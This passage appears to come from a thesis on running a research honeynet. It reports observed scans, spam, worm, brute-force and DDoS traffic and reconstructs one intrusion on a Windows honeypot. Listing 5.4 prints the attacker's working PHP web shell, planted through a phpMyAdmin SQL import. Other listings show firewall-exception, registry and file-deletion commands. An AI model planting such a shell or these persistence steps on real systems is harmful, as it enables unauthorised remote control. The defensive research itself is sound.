When the server is started, it is bound to an open system port and begins processing
the recorded network packets that are replayed by the client program. Once the header
of an executable is found, the file is restored and saved to hard disk.
Header recognition techniques are also implemented in Foremost19 , a so-called data
carving utility that was originally developed by the United States Air Force Office of
Special Investigations (AFOSI) and the Center for Information Systems Security Studies
and Research (CISR). It is compatible to Linux operating systems and variants of the
Berkeley Software Distribution (BSD) and is freely available for download. One of its
primary features is to recapture images and pictures from network streams, but it often
manages to recover documents as well as video and audio files, too.
# b u i l d t h e i n d i v i d u a l c o m p o n e n t s o f PEHunter
gcc -o pehuntd pehuntd . c pehuntd . h md5 . c md5 . h - Wall - Werror
gcc -o pehuntc pehuntc . c - Wall - Werror
# g r a n t e x e c u t e p e r m i s s i o n s t o t h e b u i l t components
chmod 755 pehuntd pehuntc
# e x e c u t e t h e s e r v e r and e x t r a c t t h e c a p t u r e d b i n a r i e s
./ pehuntd
./ pehuntc < packet capture file >
Listing 5.1: Restoring Windows Executables with PEHunter
• Log File-Related Analysis Tools
Apart from recorded network dumps, log files that are generated by the Snort intrusion
detection system on the Honeywall contain valuable information about security-relevant
incidents, e.g., the date, time, and origin of an attack. Since a different log file is created
for each day, accumulating the data manually and preparing a monthly or even annual
status report of the honeynet can be quite cumbersome. For this reason, we install
the SnortALog utility by Jérémy Chartier20 . It only requires a working Perl interpreter
and, hence, can be run on most platforms, including Microsoft Windows. SnortALog
is capable of processing multiple log files simultaneously and prints a summary of the
detected alerts, the IP addresses involved, and sorts the entries according to their severity. Furthermore, due to a number of filter expressions, specific warning and notification
18
see http://honeytrap.mwcollect.org/pehunter.html
see http://foremost.sourceforge.net/
20
see http://jeremy.chartier.free.fr/snortalog/
19
95
messages by the intrusion detection system can be excluded from the final report if
desired. These features make SnortALog highly efficient when observing the state of
individual decoys and help security professionals save time during an investigation.
• System-Related Analysis Tools
After a system has been compromised, we must not use its file and process utilities for
our analysis because of several reasons: First, the operating system may be subject to
subversion (cmp. Carrier, 2006). For example, many attackers download rootkits to the
target computer after a successful intrusion in order to conceal their presence. Rootkits
are “Trojan horse backdoor tools that modify existing operating system software so
that an attacker can keep access to and hide on a machine” (Skoudis and Zeltser, 2003,
p. 303). Because of these modifications, the underlying platform must not be trusted
any longer. Second, by executing programs on the local computer, the MAC times of
certain files are likely to be updated. The MAC times keep track on when a file or its
meta-information was accessed, modified or changed for the last time (cmp. Farmer and
Venema, 2005). When these times are altered, we are unable to restore the original
state after the break-in, the system is contaminated with our own traces, and pieces of
evidence are potentially destroyed.
To circumvent these problems, we propose to boot a penetrated honeypot from the
Helix forensic Live CD21 . It contains many applications that are helpful for an investigation, including the md5deep file integrity utility22 . With MD5deep, we can recursively
calculate or check cryptographic checksums of entire file systems within a short amount
of time. These checksums may then be compared against official black and white lists
lists such as the National Software Reference Library (NSRL) in order to quickly identify
malicious applications (see NIST, 2008).
During the examination, Helix also mounts all partitions of the inspected machine
as read-only by default. Consequently, we are never at risk of overwriting valuable
information or data.
5.1.4 Summary of the Implementation and Deployment
Process
Several key factors have to be taken into consideration when deploying a honeynet.
First, we recommend setting up at least two decoys with different operating systems
and applications to capture attacks on multiple platforms. In our case, we implement
honeypots based on both Linux and Microsoft Windows operating systems with various
system services that are commonly targeted “in the wild”. A summary illustration of
the entire system architecture is presented in Figure 5.7.
21
22
see http://helix.e-fense.com/Download.php
see http://md5deep.sourceforge.net/
96
Figure 5.7: System Architecture of the Honeynet
The machines must be permanently watched with the help of the Honeywall, a monitoring and filtering gateway device that permits controlling all inbound and outbound
network activities. The Honeywall needs to be carefully configured to prevent external
third parties from getting harmed.
After a honeypot has been compromised, we have to examine the individual steps and
actions of the intruder to learn more about her motives, tactics, and intentions. During
the analysis, the Walleye web management tool which is part of the Honeywall is of
great help. It offers a comfortable user interface for the generated data records, e.g.,
network packet dumps, firewall logs, and other system-relevant information. In addition
to Walleye, a number of further programs are noteworthy for an investigation as well,
most importantly Wireshark, a powerful network analyzer that enables inspecting traffic
flows in detail.
97
In the following section, we give an overview about the collected honeynet data and
outline the results of our research. Two particularly interesting attacks are presented in
depth in Section 5.3.
5.2 Overview about the Collected Honeynet Data
Our honeynet was successfully connected to the Internet on February 27, 2008. For
slightly more than 5 months, we have monitored connections to and from our decoys.
During this observation period, we have captured more than 21.5 Gb of raw network
traffic, including more than 130 million packets.
Manually investigating these huge amounts of data is infeasible. Therefore, a significant level of automation is required to dissect the individual flows and generate statistic
reports. The different tools and utilities we have introduced in the previous section are
invaluable for these tasks. However, in many cases, we also need to develop our own
scripts, e.g., to extract certain text or data patterns, or to examine particularly interesting information in more detail. Unless otherwise stated, these scripts are included on
the accompanying CD of this thesis.
A concise summary of the interactions with our honeynet is presented below. A
description of specific attacks that we have frequently been confronted with is subject
of Section 5.2.2.
5.2.1 Interactions with the Honeynet
In the course of the observation period, we monitored communication requests from more
than 3,900 different IP addresses. As illustrated on the world map depicted in Figure 5.8,
the respective hosts were spread over all continents. Areas drawn in darker red reflect
clusters with more than 100 machines. The top countries with the highest number of
unique systems are shown in Table 5.3. The list comprises China, the United States as
well as several Western European countries such as Germany or France. These results
are consistent with findings by Holz (2006) and Curran et al. (2005). Surprisingly, many
connections were also initiated from computers located in Taiwan. In contrast, many
countries in North and Eastern Europe, South America, and Africa did only slightly
interact with our honeynet, if at all. These states are visualized in lighter green in
Figure 5.8.
It is important to note though that not all network flows coming from or going to
a honeypot necessarily imply an attack. For example, legitimate system components
may periodically contact external servers, e.g., to check for new program updates (cmp.
Honeynet Project, 2004b). These update procedures cannot be disabled in all cases. As
a result, data records are polluted to a certain degree. For this reason, the amount of
captured traffic is neither a reliable indicator for the quantity of incidents, nor for their
quality.
98
Figure 5.8: Origins of Machines Interacting with the Honeynet
#
1
2
3
4
5
6
7
8
9
10
Country
China
United States
Germany
Canada
Taiwan
France
Italy
Japan
Netherlands
United Kingdom
Number of Systems Involved
868
632
295
226
183
163
142
105
100
80
Table 5.3: Top 10 Countries Interacting with the Honeynet
We may estimate the extent of malicious activities more accurately by analyzing notifications that are generated by the Snort intrusion detection system. In sum, more
than 13,600 threats were identified. These threats can be distinguished according to
their priority rating and their attack classification as indicated in Figure 5.9(a) and Figure 5.9(b). As can be seen, more than 86% of all alerts were raised by autonomously
propagating worms or automated password brute force utilities.
Password brute force attacks usually intend to compromise the administrative account
of a machine as we will see in a later section of this thesis. If such an operation succeeds,
the entire system platform is at imminent risk. Therefore, this type of incident must
be monitored with a high priority. The same holds true in case a web application is
compromised (cmp. Andrews and Whittaker, 2006). Unfortunately, only a small amount
of intruders sought to exploit file inclusion vulnerabilities (cmp. Section 5.1.1) or other
types of security weaknesses. All of these efforts failed in the end. In contrast, many
worms we have observed targeted older vulnerabilities that are fixed on most modern
99
(a) Priority-Based Classification
(b) Activity-Based Classification
Figure 5.9: Classification of Attacks Reported by the Snort Intrusion Detection System
computer systems. A successful penetration is unlikely in these cases. Consequently,
these malware species may be investigated with lesser priority. In compliance, port
scans and other information gathering attempts do not directly affect the integrity of a
honeypot. That is why these activities are rated with a lower priority as well.
5.2.2 Common Attacks on the Honeynet
Throughout the observation period, certain types of attacks were repetitively launched
against our honeynet. As members of the Honeynet Project report, these types of attacks
are commonly found in other honeynet setups as well (cmp. Honeynet Project, 2004b,
p. 56-57).
However, we need to emphasize that a significant number of the threats presented
below were not correctly recognized by the default rule set of the Snort intrusion detection system. The Distributed Denial of Service attacks on one of our decoys that are
illustrated in more detail in Section 5.2.2.5 were even not indicated at all. For this reason, we strongly recommend to examine captured traffic flows regularly with additional
data analysis utilities. The tools and applications introduced in Section 5.1.3.2 are well
suited for these tasks. Thereby, anomalies and suspicious network patterns are likely to
be found more easily.
5.2.2.1 Application and Vulnerability Scans
Attackers usually go through some phase of active reconnaissance prior to an intrusion
in order to learn as much as possible about the target platform (cmp. McClure et al.,
2005). This phase includes so-called fingerprinting and mapping techniques that help
identify the operating system as well as running services and applications (see Ruef, 2007,
for a systematic approach to these steps). A comprehensive knowledge of the system
configuration and its flaws may greatly facilitate a later penetration. Despite these
findings, information gathering activities are often narrowed down to a certain type of
vulnerability only. As a result, adversaries solely test whether or not a system is exposed
100
1
2
3
4
5
6
7
8
9
GET
GET
GET
GET
GET
GET
GET
GET
...
/ phpmyadmin / main . php HTTP /1.0
/ admin / main . php HTTP /1.0
/ mysql / main . php HTTP /1.0
/ PMA / main . php HTTP /1.0
/ phpMyAdmin -2.6.3/ main . php HTTP /1.0
/ phpMyAdmin -2.6.2 - rc1 / main . php HTTP /1.0
/ phpmyadmin2 / main . php HTTP /1.0
/ db / main . php HTTP /1.0
Listing 5.2: Example of a Network Scan for Instances of the phpMyAdmin Database
Administration Program
to a specific attack. If this is the case, the respective host is exploited, otherwise the
blackhat moves on and probes another machine. As members of the Honeynet Project
(2004b, p. 563) conclude, most intruders “are not interested in breaking into a specific
system, but interested into as many systems as possible” and “focus on the easy kill”.
To a great degree, these tasks can be automated with scripts and freely available
toolkits. For instance, the DFind23 utility by Arnaud Dovi is able to search for vulnerable
web servers, database management systems, and various other security weaknesses. It
leaves suspicious traces in the log files as shown in Figure 5.10 though. The string
w00tw00t.at.ISC.SANS.DFind clearly stands out and quickly catches the eye of a trained
analyst. Therefore, the DFind utility may be detected quite easily. On average, we
monitored three of these scans per day.
Figure 5.10: Request of the DFind Vulnerability Scanner
In addition, our honeypots were frequently checked for installations of the phpMyAdmin database administration program. For this purpose, adversaries sent sample requests to typical application directories. As indicated in Listing 5.2, tests covered both
generic as well as specific versions of the software. In total, more than 10,000 connections
were initiated, less than 3% were successful and provoked a response. Even though this
may appear as a minor fraction, an instance of the program that is fully accessible over
the network poses a significant threat to the entire system architecture as we will see in
Section 5.3.1.
23
see http://heapoverflow.com/f0rums/projects/tools/20-dfind-port-scanner/
101
5.2.2.2 Spam-Related Attacks
One type of incident that we have witnessed particularly often is known as the PopUp
Spam attack (see Baldwin, 2003). It abuses the Microsoft Windows Messenger Service
to deliver unsolicited bulk text messages to computer users.
The Messenger Service was originally designed to help system administrators send
status messages across a network (cmp. Microsoft Corporation, 2004a). By default, it
is solely enabled on Microsoft Windows 2000 operating systems as well as Microsoft
Windows XP prior to service pack 2. Modern-day computer systems are not affected.
Various techniques do exist to carry out the attack successfully: A spammer may,
for instance, invoke a series of simple net send commands to start interacting with the
remote message service. In this case, requests are transported via the NetBIOS and
SMB (Server Message Block) network protocols (see Baldwin, 2002b). For this purpose,
a full TCP connection must be established with the machine of the victim though, and a
bi-directional communication channel is opened on port 139. Because this channel may
be traced back to the sender, the attacker cannot trivially conceal her identity.
A more sophisticated approach is to wrap the message inside a single UDP datagram
and pass it directly to the processing queue of the service that is listening on an ephemeral
port in the range of 1025 and 1029 (see Baldwin, 2003). The UDP (User Datagram
Protocol) protocol is unreliable and connectionless, i.e., packet deliveries do not need to
be acknowledged as opposed to the TCP-based transport mechanism used in the prior
attack (see Comer, 2000; Postel, 1980). Due to these characteristics, the adversary may
forge the source address of the message more easily and stay anonymous.
When a spam message arrives at the client system, a notification box “pops up”,
indicating a number of security weaknesses had been found that needed fixing. Typically,
a specific commercial product is offered for sale as a solution. An example of such a
message is shown in Listing 5.3.
" STOP ! WINDOWS REQUIRES IMMEDIATE ATTENTION .
Windows has found 55 Critical System Errors .
To fix the errors please do the following :
1.
2.
3.
4.
Download Registry Update from : <xxx >
Install Registry Update
Run Registry Update
Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO SYSTEM FAILURE !"
Listing 5.3: Example of a PopUp Spam Message
102
Figure 5.11: Geographical Spread of PopUp Spam Attacks
City
Haerbin
Mudanjiang
Shanghai
Shenyang
Taiyuan
Zhenjiang
78
7
1
2
33
4
Number of Messages Sent
12,925
1,474
4
27
3,772
387
Table 5.4: Origins of PopUp Spam attacks
Even though the attack does not cause any direct damage, an inexperienced user
potentially falls prey to the con and is tricked to buy a dubious software application.
Furthermore, considering the frequency similar messages are received, this type of advertisement quickly gets annoying: On average, we monitored 53 product offers per day.
In total, we captured more than 19,200 messages. These messages were entirely sent
from 125 machines located in six Chinese cities. The geographical spread of the attacks
is visualized in Figure 5.11, a summary of our analysis is given in Table 5.4.
5.2.2.3 Malware-Based Attacks
As we have already explained, a large number of alerts were raised by the Snort intrusion detection system due to worm activities. For example, we calculated a mean
value of 23 attacks per day solely by the Slammer worm (a.k.a. Sapphire). This type
103
Figure 5.12: Packet Dump of the Slammer Worm
of malware exploits a buffer-overflow vulnerability in the Microsoft SQL Server 2000
database administration system or in the Microsoft SQL Server Server Desktop Engine
(MSDE) (see CERT, 2003a). Due to its small size of slightly more than 400 bytes and
a UDP-based propagation strategy, the worm spreads significantly faster than other
threats such as Code Red or Nimda (cmp. Moore et al., 2003). The payload of a captured Slammer packet is shown in Figure 5.12. We clearly see several strings such as
dllhel32hkernQhounthickChGetTf or toQhsend that may be used to create a unique fingerprint of the worm. Similar techniques can be applied to identify common malicious
activities that are monitored within a honeynet. This process can also be automated
as illustrated by Kreibich and Crowcroft (2004): With the Honeycomb application24 , it
is possible to automatically analyze captured traffic of a honeypot and generate corresponding signatures for network monitoring devices. Similar approaches have also been
pursued by Singh et al. (2004) with Earlybird, Kim and Karp (2004) with Autograph,
Newsome et al. (2005) with Polygraph, as well as Li et al. (2006) with Hamsa (see also
Wang et al., 2006).
5.2.2.4 Password Brute Force and Dictionary Attacks
Throughout the entire observation period, our honeypots were constantly hit by automatic brute force or dictionary attacks, i.e., intruders tested a large number of username
and password combinations in order to find valid authentication credentials for specific
system services and applications such as the secure shell server or the phpMyAdmin
database administration program. As indicated in Figure 5.13, the attacking machines
were spread over five continents. Many probes originated from western European countries, e.g., France (66,457 attacks) or Sweden (61,247 attacks). However, certain ge24
see http://www.icir.org/christian/honeycomb/
104
Figure 5.13: Origins of Password Brute Force Attacks
ographic areas of the eastern hemisphere were significantly involved in the incidents
as well. For example, more than 24,000 password checks were detected from cities in
Australia, more than 17,000 login attempts were traced to Hongkong.
With the help of the trojaned program routines that we had implemented in our
system services, we were able to intercept the individual authentication credentials in
the clear before they were encrypted (cmp Section 5.1.3.1). In sum, we captured almost
295,000 passwords. After analyzing the data in more detail, we generated a dictionary
of about 65,000 unique words. This dictionary may help users assess the quality of their
own credentials, because any entry in the list must be regarded as insufficiently strong
and reflects a security weakness. The top 30 passwords that we recorded are shown
in Table 5.5. As can be seen, password tests included single letters, words, strings
concatenated according to the keyboard layout (e.g., asdfgh), sequences of numbers,
and variations of these categories (e.g., test123). Furthermore, names of persons, swear
words, and derogatory expressions were also frequently chosen. It is also noteworthy
that, on average, in three out of 100 attacks, blackhats tried to completely circumvent
the authentication procedure and did not specify any password.
The majority of intruders sought to compromise the root superuser account of the operating system or the database management application, respectively (see Figure 5.14).
In 24% of all cases, a non-privileged user or a non-privileged system account such as
ftp or www were targeted. These accounts are often only weakly protected (cmp. Klein,
1990). After a successful breach, the attacker is possibly able to escalate her privileges
(see Honeynet Project, 2004b). Therefore, these types of incidents must be regarded as
a severe threat, too.
What is quite surprising though is the fact that more than 28,000 times, adversaries
attempted to log in as admin or administrator. Considering that, by default, these
two usernames are usually undefined for both the SSH server as well as for the phpMyAdmin application, the attacks were doomed to fail and imply rather little technical
understanding.
105
#
1
2
3
4
5
6
7
8
9
10
Password
123456
123
1234
password
12345
test
admin
a
root
1
#
11
12
13
14
15
16
17
18
19
20
Password
roo
!@
abc123
qwerty
abc
changeme
adm
user
master
p
#
21
22
23
24
25
26
27
28
29
30
Password
oracle
passwd
1q2
1q2w3e
12345678
mysql
1234567
test123
guest
asdfgh
Table 5.5: Top 30 Passwords Used During Brute Force Attacks
Figure 5.14: User Accounts Targeted By Password Brute Force Attacks
5.2.2.5 Distributed Denial of Service Attacks
In addition to the incidents outlined above, our honeynet was also struck by so-called
Distributed Denial of Service (DDoS) attacks. One approach to carry out such an attack
is to flood the target system with a huge number of network packets (see Peng et al.,
2007). Thereby, its resources such as memory or processing time are exhausted, and
incoming requests cannot be properly processed any longer. As a result, the performance
level is degraded, the server gets unresponsive, and may even crash (see also Handley
and Rescorla, 2006; CERT, 2001c).
To successfully take the victim off the Internet, the adversary abuses several machines
under her control. At a certain point of time, these machines are commanded to start
a coordinated packet storm. A schematic overview about this procedure is illustrated in
Figure 5.15, a more detailed explanation is given by Mölsä (2005).
As Peng et al. (2007) point out, typically either the TCP, ICMP, or UDP network
protocols are used as transport mechanisms for these operations. In our case, we have
observed four UDP-based DDoS attacks on one decoy. On the respective days, UDP
traffic dramatically increased as can be seen in Figure 5.16. The timeline for an attack is
106
Figure 5.15: Schematic Overview of a Distributed Denial of Service Attack
(Source: Based on Criscuolo, 2000)
shown in Figure 5.17. In the first 17 hours prior to the incident, we measured an overall
sum of 85 packets only. At the beginning of the attack at 05:03 p.m, this figure suddenly
jumped to more than 400,000 packets. For two hours, we monitored between 100,000
and 800,000 packets per minute going to our honeypot. At the end of the DDoS attempt,
UDP packet rates quickly decreased, and only 36 further packets were captured in the
remaining hours of the day. In total, almost 82 million packets were sent to our machine
during the four attacks. 22 systems from 8 countries were involved in the incidents. A
summary of the results is shown in Table 5.6.
The majority of packets solely contained the single-byte character 0x30 and targeted
arbitrary ports of our system (see Figure 5.18). Accessing random port on the machine
of the victim is an efficient flooding technique (cmp. Criscuolo, 2000): In many cases,
the port in question is likely to be closed. Consequently, in compliance with Postel
(1981a), the operating system generates an ICMP Destination Unreachable notification
message that is returned to the sender. In sum, these messages act as further amplifiers
for the attack and possibly affect other machines on the network as well. Criscuolo
(2000, p. 14) concludes: “If enough UDP packets are sent to dead ports on the target
host, not only will the target host go down, but computers on the same segment will
also be disabled because of the amount of traffic”. Luckily, all outbound messages were
successfully blocked by the Honeywall to mitigate risks as best as possible.
107
Figure 5.16: Number of UDP Packets Captured per Day in the Honeynet
Country
United States
Thailand
Mexico
India
South Korea
France
United Kingdom
Japan
6
5
3
3
2
1
1
1
Number of Packets Sent
37,932,042
21,217,361
14,024,735
4,527,677
3,828,526
160,622
110,566
83,755
Table 5.6: Countries Involved in Different Distributed Denial of Service Attacks
In about 16% of the captured data samples, we extracted larger payloads up to 50 bytes
that were destined for the two UDP ports 22 and 80. We were unable to determine why
specifically these ports were flooded though.
Mirkovic and Reiher (2004) and Chang (2002) have identified several motives for
DDoS attempts, e.g., inflicting damage on business competitors due to monetary reasons.
However, these motives are not sufficiently applicable to our honeynet architecture.
Therefore, why our decoy was attacked remains speculative in the end.
108
Figure 5.17: Timeline of a UDP Packet Storm on a Honeypot
Figure 5.18: Analysis of a UDP Packet Storm
109
5.3 Selected Attacks on the Honeynet
In the following, we present two attacks on our honeypots in detail. We illustrate the
tools and tactics that were of great help during the intrusion as well as try to explain why
the systems were targeted and what they were used for once the had been penetrated.
5.3.1 Attack on the Microsoft Windows Honeypot
Our Microsoft Windows-based honeypot was successfully compromised less than 24 hours
after we had connected the decoy to the Internet. A summary of the attack sequence
is presented below, shortly followed by an evaluation of the incident. A basic personal
profile as well as a taxonomy of the intruder are subject of Section 5.3.1.3 and 5.3.1.4.
5.3.1.1 Sequence of the Attack
On February 28 at 7:44:59 p.m., the phpMyAdmin database administration program is
opened over the HTTP protocol by an adversary with the IP address 87.230.xxx.xxx.
Due to improper configurational settings, the application is fully accessible over the Internet as we have stated in Section 5.1.1. Consequently, the individual components are
prone to manipulation, including the mysql main database that saves sensitive information such as usernames and passwords. However, the blackhat does not take notice of
the data but begins to import a prepared SQL (Structured Query Language) script that
is printed in Listing 5.4. When it is executed, a basic file upload utility is created in the
root directory of the server that also permits running arbitrary commands on the host.
To perform said operations, a temporary database table needs to be generated (see
Line 1). It is deleted with the help of the drop instruction at the end of the script to
erase the traces of the intrusion.
Although the techniques described above are quite simple, they clearly demonstrate
how a misconfigured database management system may easily put the underlying platform at risk.
At 7:47:31 p.m., the attacker starts downloading a number of tools after briefly checking the configuration of the network interface card. Using the rcp command which is
part of the operating system, a remote connection with the IP address 85.176.xxx.xxx is
established, and a file mo.php is transferred to the target machine. This file is recognized
as a variant of the c99 shell, a trojan backdoor that is written in the PHP programming
language. As can be seen in Figure 5.19, the trojan comprises a powerful graphical interface that offers many features, including browsing through the entire directory hierarchy,
editing or deleting contents, and executing commands.
110
1
create table dblog ( text text ) ;
2
3
4
insert into dblog set text = ’
<? $sendfile = $_REQUEST [ " sendfile " ]; $cmd = $_REQUEST [ " - cmd " ];
5
if ( $sendfile == " true " ) {
$fn = $_FILES [ " file " ][ " name " ];
$tn = $_FILES [ " file " ][ " tmp_name " ];
6
7
8
9
if ( m ov e_ up lo ad ed _f il e ( $tn , dirname ( __FILE__ ) . " / " . $fn ) )
$result = " <br > < font color = green > upload done </ p > " ;
else
$result = " <br > < font color = red > upload failed </ p > " ;
10
11
12
13
}
?>
14
15
16
< html > < body >
< form method = POST >
< input type = TEXT name = " - cmd " size =64 value = " <?= $cmd ? > " >
</ form >
< form enctype = " multipart / form - data " method = " post " action = " " >
< input type = file name = file size =20 >
< input type = " submit " value = " Upload " >
< input type = " hidden " name = " sendfile " value = " true " > <?= $result ? >
</ form >
<pre > <? if ( $cmd != " " ) echo shell_exec ( $cmd ) ;? > </ pre >
</ body > </ html > ’;
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
select * from dblog into outfile ’C :/ xampp / phpMyAdmin / db_log . php ’;
DROP TABLE ‘ dblog ‘;
FLUSH LOGS ;
Listing 5.4: Manipulation of the System Database
Apart from the c99 shell, two additional files are copied to the honeypot, namely
secure.old and secure.exe. The latter is identified as the Serv-U file transfer server
by Rhino Software25 . The program can be silently installed and invoked on the command
line and therefore enjoys a questionable reputation in the underground community (see
Rhino Software, 2004; Baldwin, 2002a). The second file, secure.old, contains initialization instructions as well as a list of pre-defined account names that may be used to
log in to the server.
After all operations are completed, the attacker quickly verifies that the two components have been successfully transferred to the decoy by running the dir command and
listing the contents of the root directory. With the help of the PHP shell, the Serv-U FTP
server is installed as a system service in the next step (see Listing 5.5). Furthermore, an
exception is added to the local firewall rules to avoid traffic filtering and allow incoming
25
see http://www.serv-u.com/
111
Figure 5.19: User Interface of the c99 shell Trojan Backdoor
requests. At last, the service is started with the net start command and gets bound
to six different network ports. Again, the intruder attempts to disguise her activities
by choosing several well-known ports, e.g., port 53 that is registered for DNS (Domain
Name Service) lookups (see Internet Assigned Numbers Authority (IANA), 2008).
At 7:51:45 p.m., a first FTP session is initiated, and a small-sized binary bw1.exe is
stored on the decoy. The program is capable of measuring the bandwidth of the Internet
connection. For this purpose, a sample file must be repeatedly retrieved. In our case,
the Service Pack 3 for Microsoft Windows 2000 is downloaded 10 times. In total, more
than 1.25 GB of data are sent to our machine during this process.
At the end of the speed test, the attacker saves an audio file to the special directory
System Volume Information on the primary partition of the hard disk. This directory
usually contains information about certain system restore points and cannot be accessed
at runtime by default (see Russinovich and Solomon, 2004). The restrictions only apply to the local computer though and can be circumvented through the external FTP
communication. Under normal circumstances, the actions of the intruder would thus be
hidden from the eyes of legitimate users.
112
1
2
# the attacker
secure . exe / i
i n s t a l l s t h e S e r v −U FTP s e r v e r a s a s y s t e m s e r v i c e
3
4
5
6
# an e x c e p t i o n i s a d d e d t o t h e l o c a l f i r e w a l l r u l e s
netsh firewall add allowedprogram C :\ xampp \ phpMyAdmin \ secure . exe
ftp ENABLE
7
8
9
# the system s e r v i c e i s
net start secure
finally
started
Listing 5.5: Installation of the Serv-U FTP Server
1
@echo off
2
3
...
4
5
6
7
8
# s t o r e t h e new v a l u e s i n t h e h e l p e r f i l e C : \ h i d e . r e g
echo Windows Registry Editor Version 5.00 > c :\ hide . reg
echo [ HKE Y_ LO CA L_ MA CH IN E \ SYSTEM \ Cu rrentC ontrol Set \ Control \ Terminal
Server ] > > c :\ hide . reg
echo " All ow TS Co nn ec ti on s " = dword :00000001 > > c :\ hide . reg
9
10
11
12
# import the v a l u e s to the system r e g i s t r y
REGEDIT / S c :\ hide . REG
13
14
15
# delete the helper
DEL / Q c :\ hide . REG
file
16
17
...
Listing 5.6: Modification of the System Registry
In the following two hours, several further tools are stored on the honeypot to stay in
control of the machine and conceal the incident. First, the adversary uploads a batch
file ts.bat that modifies certain values in the system registry in order to enable the
Microsoft Terminal Service. An extract of the file is shown in Listing 5.6. With the help
of the service, it is possible to administrate the operating system over the network.
At 8:10:25 p.m, the attacker copies a different variant of the c99 trojan backdoor to the
root directory of the phpMyAdmin web application that serves as a replacement for the
original PHP shell. The file is disguised as tbl_index.php. What is more interesting,
the source code of the trojan is obfuscated, i.e., it is made illegible by encoding all
embedded strings, variables, and programming instructions. Thus, reverse engineering
of the program is significantly more difficult, and antivirus scanners as well as malware
removal utilities may possibly be bypassed.
113
1
2
3
4
5
6
7
8
9
del
del
del
del
del
del
del
del
del
\ sql . php / S / Q / F >> Found . txt
\ server_variables . php / S / Q / F >> Found . txt
\ read_dump . php / S / Q / F >> Found . txt
\ import . php / S / Q / F >> Found . txt
\ s erver_ privil eges . php / S / Q / F >> Found . txt
\ tbl_replace . php / S / Q / F >> Found . txt
\ phpinfo . php / S / Q / F >> Found . txt
\ main . php / S / Q / F >> Found . txt
1. bat
Listing 5.7: System Hardening Operations on the Compromised Honeypot
The intruder also deletes several software modules of phpMyAdmin by running another
batch file, 1.bat, which is transferred to the decoy (see Listing 5.7). On the one hand,
these actions severely damage the application so it cannot be executed any longer. On
the other hand, the entry point to the system is closed, and related attacks are effectively
prevented.
As indicated in Listing 5.7, the result of each delete operation is appended to the
temporary file Found.txt to make sure the machine has been successfully hardened.
This file is downloaded at a later point of time.
At 8:12:23 p.m., the attacker starts covering her tracks and erases a number of programs that are not needed any more, including the original c99 shell. In the last step,
various supplemental components for the Serv-U daemon are copied to a subfolder in the
Windows system directory before the FTP session is terminated. The individual components are listed in Table 5.7 and are required to install another version of the Serv-U
FTP server. The application is disguised as a DNS server and supports encrypted data
transfers.
Run Level
a.bat
Dnslib32api.cat
Dnstts.exe
MD5 Checksum
Description
Batch script that is
executed to install a
disguised version of
4a8786fffb14bb8facf288f3cffcf42e
the Serv-U FTP server
with support for encrypted data transfers.
Auxiliary file for the
1c0aacaf30b92277cfe55af07c200cfc
disguised FTP server.
Main executable of the
cfe9801298579cd93e340d4cb84af8fd disguised Serv-U daemon.
114
Run Level
MD5 Checksum
libeay32.dll,
ssleay32.dll
cfe9801298579cd93e340d4cb84af8fd
d18bcf48a7624154745c0526cc8576f3
ServUCert.crt,
ServUCert.key
7b8fa286633f087b2faf9a9584dcc72a
2293486183632e8634aa30a1798bc5e7
Description
Dynamic libraries that
provide cryptographic
functions in order to
establish a secured
connection.
Security
certificate
and private key of the
FTP server that are
needed to initiate an
encrypted session.
Table 5.7: Additional Components of the Serv-U FTP Server
that are Required to Establish a Secured Connection
Three minutes later, at 8:15:24 p.m., such a secured channel is established with the
server. Due to the use of strong encryption algorithms, examining the corresponding
traffic flows would usually be infeasible at this point. In our case though, we are in
possession of the private key of the server which is needed to decypher the network
packets. Unfortunately, the key is protected with an unknown pass phrase and, thus,
cannot be processed directly. To find the pass phrase, we run the strings utility which is
included in most Linux distributions and extract all text patterns that are referenced by
the server. After a short inspection of the results, we are lucky and succeed in generating
a new, unencrypted private key by executing the free OpenSSL cryptography toolkit26
as follows (cmp. OpenSSL Project, 2003):
openssl rsa - passin pass :[ pass phrase ] - in ServUCert . key - out
ServUCert - Unencrypted . key
In the next step, the new key can be imported to the Wireshark network analyzer
as explained by Garland (2008). The captured data are then automatically decrypted
as indicated in the lower right corner of Figure 5.20. As a consequence, we are able to
recover the activities of the intruder and proceed with our investigation.
Analyzing the secured session: Feeling protected by the encrypted communication
channel, the adversary starts uploading a number of further utilities at 8:15:54 p.m.:
The script install.cmd sets up a new system service lsasvc.exe which is identified as
the Hacker Defender rootkit, version 1.0. The rootkit is capable of hiding specific files,
processes, system registry keys, and network ports that are defined in a corresponding
initialization file. In our case, all traces of the attack tools are removed. For instance, the
newly installed FTP and DNS servers are excluded from the process list (see Figure 5.21).
What is quite peculiar is the fact that various legitimate system components such as
26
see http://www.openssl.org/
115
Figure 5.20: Analyzing Encrypted Network Traffic with Wireshark
the service management screen or the Windows firewall are disabled during this process,
too. Thereby, the attacker makes sure the original state of the compromised machine
cannot be easily restored on the one hand. On the other hand, these types of system
manipulations are extremely conspicuous and are likely to be detected by any system
administrator.
In addition to the rootkit, the intruder saves three dynamic libraries to a subfolder
in the installation directory of the operating system. These libraries provide auxiliary
functions for the Serv-U FTP server, e.g., to retrieve summary reports about the number
of users that are currently logged in or to calculate the total amount of data that were
transferred in the course of a FTP session. Furthermore, they enable to display personal
messages or logos when a connection has been successfully established. Although this
rather seems as a minor feature, custom login banners are frequently used by blackhats
to “advertise” their name, greet competing groups, and gain social status in the underground community (cmp. Honeynet Project, 2004b; Craig and Burnett, 2005; Rogers,
116
(a) Running processes on the system before the
rootkit is being executed.
(b) After the rootkit has been installed, specific
processes are removed from the process list.
Figure 5.21: Subversion of a System With the Hacker Defender Rootkit
2000b). An example of such a banner that we captured on our honeypot is presented in
Figure 5.22.
After all operations are completed, the adversary invokes an internal site maintenance
interface multiple times to check the functionality of the server. With the help of this
interface, it is possible to adapt core configurational settings of the service over a remote
connection such as changing the network ports the application is bound to.
In the last step, the adversary logs in as the alternative user fill0r, uploads an audio file
as well as the first part of a pirated DVD to a subdirectory of the xampp distribution, and
rechecks the status of the FTP server. The connection is finally closed at 9:54:27 p.m.
At this point, we decide to shut down our honeypot and start analyzing the compromise.
The individual tools that were used for the penetration are summarized in chronological
order in Table 5.8, a timeline for the entire attack sequence is illustrated in Figure 5.23.
117
Figure 5.22: Custom Login Banner of the Attacker
Attack Tool
db_log.php
mo.php
secure.exe,
secure.old
MD5 Checksum
Description
Basic file upload and
command execution util72527be487571260838fa8ada207ca46 ity that is used by the
intruder to retrieve additional attack tools.
